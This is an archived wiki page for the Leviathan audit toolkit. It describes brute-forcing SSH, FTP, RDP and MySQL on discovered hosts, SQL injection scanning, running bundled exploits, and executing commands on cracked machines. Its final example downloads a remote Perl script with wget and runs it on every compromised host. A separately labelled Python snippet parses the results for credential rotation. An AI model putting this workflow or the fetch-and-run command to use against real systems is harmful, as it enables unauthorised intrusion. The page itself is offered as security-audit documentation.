This repository has been archived by the owner on Jan 25, 2019. It is now read-only.

Attack Menu

Utku Sen edited this page Apr 26, 2017 · 1 revision

Video Demo: https://www.youtube.com/watch?v=pxad6OwQieE

In the Attack module, you can run specific attacks against the targets discovered in the Discovery module. If you don't have any discovered targets, you can't run attacks. Please visit the "Discovery" page for this.

Successful attacks are saved under the /assets/compromised folder in the following format:

compromisemethod_service_discoveryid.txt

Example: ncrack_ssh_8593212.txt

Using Brute Force

In the 'Brute Force' section you can run brute force attacks against the following protocols: ftp, ssh, telnet, rdp, mysql. The wordlists used for the brute force attack are located under the /config/wordlists folder. You can edit them if you want to use different combinations.

Successful brute force attacks are saved in the following format:

username:password:IP_ADDRESS

For example: root:123456:1.1.1.1
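
The result file naming and the username:password:IP_ADDRESS record layout described above can be parsed when reviewing findings after an audit, for example to list the hosts whose credentials must be rotated. This is an added example, not part of Leviathan; the function names, the IPv4-only handling, the assumption that method and service names contain no underscore, and the sample data are constructed for illustration.

```python
import ipaddress
import re

# File name layout from this page: compromisemethod_service_discoveryid.txt
FILENAME_RE = re.compile(
    r"^(?P<method>[^_]+)_(?P<service>[^_]+)_(?P<discovery_id>\d+)\.txt$")


def parse_result_filename(name):
    """Split a result file name into method, service and discovery id."""
    m = FILENAME_RE.match(name)
    if m is None:
        raise ValueError("unexpected result file name: %r" % name)
    return m.groupdict()


def parse_credential_line(line):
    """Parse username:password:IP_ADDRESS.

    A password may itself contain ':', so the user name is taken up to the
    first colon and the address after the last one. IPv4 only (assumption).
    """
    user, sep, rest = line.strip().partition(":")
    password, sep2, ip = rest.rpartition(":")
    if not sep or not sep2 or not user:
        raise ValueError("malformed record")
    ipaddress.IPv4Address(ip)  # raises a ValueError subclass on a bad address
    return user, password, ip


def remediation_report(filename, lines):
    """Return (metadata, sorted [(ip, user)], skipped); passwords are dropped."""
    meta = parse_result_filename(filename)
    hosts, skipped = set(), 0
    for line in lines:
        if not line.strip():
            continue  # blank lines are not counted as malformed
        try:
            user, _password, ip = parse_credential_line(line)
        except ValueError:
            skipped += 1
            continue
        hosts.add((ip, user))
    return meta, sorted(hosts), skipped


# Constructed sample data (documentation addresses, not real results).
SAMPLE_NAME = "ncrack_ssh_8593212.txt"
SAMPLE_LINES = ["root:123456:192.0.2.10", "admin:pa:ss:word:192.0.2.11",
                "broken-line", ""]
```

The report keeps only the address and account name, so it can be passed to whoever resets the credentials without copying the recovered passwords further.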

Attack by Discovery id

In this section you can run brute force attacks by providing a discovery id. To obtain the discovery id of a scan, please visit the "Assets" menu. For example, suppose you ran a scan with Censys for the ssh service. Go to the "Assets" menu and follow these menus: "Show discovered machines" --> "ssh". It will list something like this:

ID:8275412 | Protocol:ssh | Method:censys | Date:Mon Apr 10 16:47:31 2017

Copy the ID value (8275412) and use it in Brute Force/Attack by Discovery id. Leviathan automatically runs a brute force attack against those discovered IP addresses.

Attack all discovered machines by Protocol

In this section you don't need to provide a discovery id. You select a protocol (for example: ssh) and Leviathan runs brute force attacks against all discovered IP addresses that run SSH.

Web (SQL Injection)

In this section you can search for SQL Injection vulnerabilities on pre-discovered URLs. If a target URL is vulnerable to SQL Injection, Leviathan will save the URL under the /assets/compromised folder as described above.

As in the Brute Force section, you have two options to continue:

1) Attack by Discovery id

2) Attack all discovered machines

The details are the same as in the Brute Force section.

Running Custom Exploits

Available exploits are located under the /lib/exploits folder. If you want to implement your own exploit, you need to put it in that directory. For more information about writing custom exploits, please visit the "Writing Custom Exploits" page.

To run an integrated exploit, go to Attack and then the Custom Exploit section from the Main Menu. Here, you need to provide the discovery id of the targets. If you don't have information about discovery ids, please visit the "Assets" section.

After providing the discovery id, you need to select which exploit will run against the targets. Type the exploit name (example: shellshock) and press enter.

Running Remote Commands

In the 'Run remote command' section you can execute commands remotely on compromised machines. You need to crack SSH passwords in the Brute Force section in order to use this section.

As in the Brute Force and Web sections, you have two options to continue:

1) Run Command by Discovery id

2) Run Command on all discovered machines

Obtaining a discovery id and the other details are explained in the Brute Force section.

The following example shows how to run a command on all cracked ssh services (only Unix Bash commands are supported):

-Select option 2 in the menu-

Enter your command: wget http://utkusen.com/s.pl && chmod +x s.pl && ./s.pl